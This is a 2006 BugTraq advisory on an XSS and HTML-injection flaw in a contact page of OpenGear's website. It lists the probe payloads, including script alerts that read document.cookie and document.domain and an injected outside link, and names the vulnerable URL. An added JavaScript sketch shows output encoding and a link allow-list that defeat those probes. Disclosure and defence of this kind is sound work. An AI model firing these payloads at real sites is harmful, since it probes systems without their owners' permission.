BugTraq
XSS Bug in OpenGear Server Website
Apr 24 2006 02:50PM
Aditya Metaeye Org
0x0*] Advisory
==============
Web Penetrated By:- Aditya (at) Metaeye (dot) Org [email concealed]
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
==========
0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================
http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
Copyright 2009, SecurityFocus
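As an added example (not part of the original post and not OpenGear's code), the sketch below shows the output encoding whose absence lets the probe strings listed in the advisory render as markup on a form page. The function names, the echoed input field and the http(s) link allow-list are assumptions; the probe strings are the ones quoted in the post.

```javascript
// Probe strings exactly as listed in the advisory's "Injections" section.
const PROBES = [
  `' && ""`,
  `<script>Javascript:alert("Penetrated");</script>`,
  `<p>Penetrated</p>`,
  `<a href ="www.zeroknock.cjb.net">ZeroKnock</a>`,
  `'';!--"<CSS_Check>=&{()}`,
  `'<script>javascript:alert(document.cookie);</script>`,
  `'<script>javascript:alert(document.domain);</script>`,
];

// Characters that can open a tag or close a quoted attribute value.
const ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
};

// Encode untrusted text for HTML element content and quoted attributes.
function encodeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => ENTITIES[ch]);
}

// Hypothetical allow-list for user-supplied links: absolute http(s) only.
function safeHref(value) {
  try {
    const url = new URL(String(value).trim());
    return ['http:', 'https:'].includes(url.protocol) ? url.href : null;
  } catch {
    return null; // relative, scheme-less or malformed input is rejected
  }
}

// Echo a submitted field back into the form, as a fixed template would.
function renderEcho(name, value) {
  return `<input type="text" name="${encodeHtml(name)}" value="${encodeHtml(value)}">`;
}

// True when encoded output can no longer start markup or break out of quotes.
function isInert(encoded) {
  return !/[<>"'`]/.test(encoded);
}

// Run every advisory probe through the encoder and report the result.
function auditProbes() {
  return PROBES.map((probe) => {
    const encoded = encodeHtml(probe);
    return { probe, encoded, inert: isInert(encoded) };
  });
}
```

`auditProbes()` can serve as a regression check for the template layer: every entry should report `inert: true` once encoding is applied at the point of output.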